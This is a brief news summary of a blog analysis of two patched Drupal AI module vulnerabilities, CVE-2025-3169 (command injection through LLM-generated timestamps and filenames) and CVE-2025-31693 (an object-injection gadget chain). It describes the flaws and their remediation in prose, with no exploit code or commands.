Analysis of Past Security Flaws in Drupal AI Module Highlights LLM Risks
Drew Webber’s detailed blog post from May 2025 unpacks CVE-2025-3169, a Remote Code Execution flaw in Drupal’s AI Automators submodule. Originally disclosed in March, the vulnerability allowed shell command injection via LLM-generated timestamps and unsanitized filenames, with examples showing how attackers could gain a reverse shell through PHP’s `exec()`
.
A second issue, CVE-2025-31693, involved a “Gadget Chain” where object injection could trigger arbitrary file deletion or command execution. The analysis underscores the risks of blindly trusting LLM output and unsanitized user input in shell-based workflows.
Though more than a month old, this post remains relevant due to the increasing use of AI integrations in Drupal. Webber’s walkthrough of exploit mechanics and remediation, patched in AI module version 1.0.5, offers valuable lessons for anyone building or securing Drupal automation features.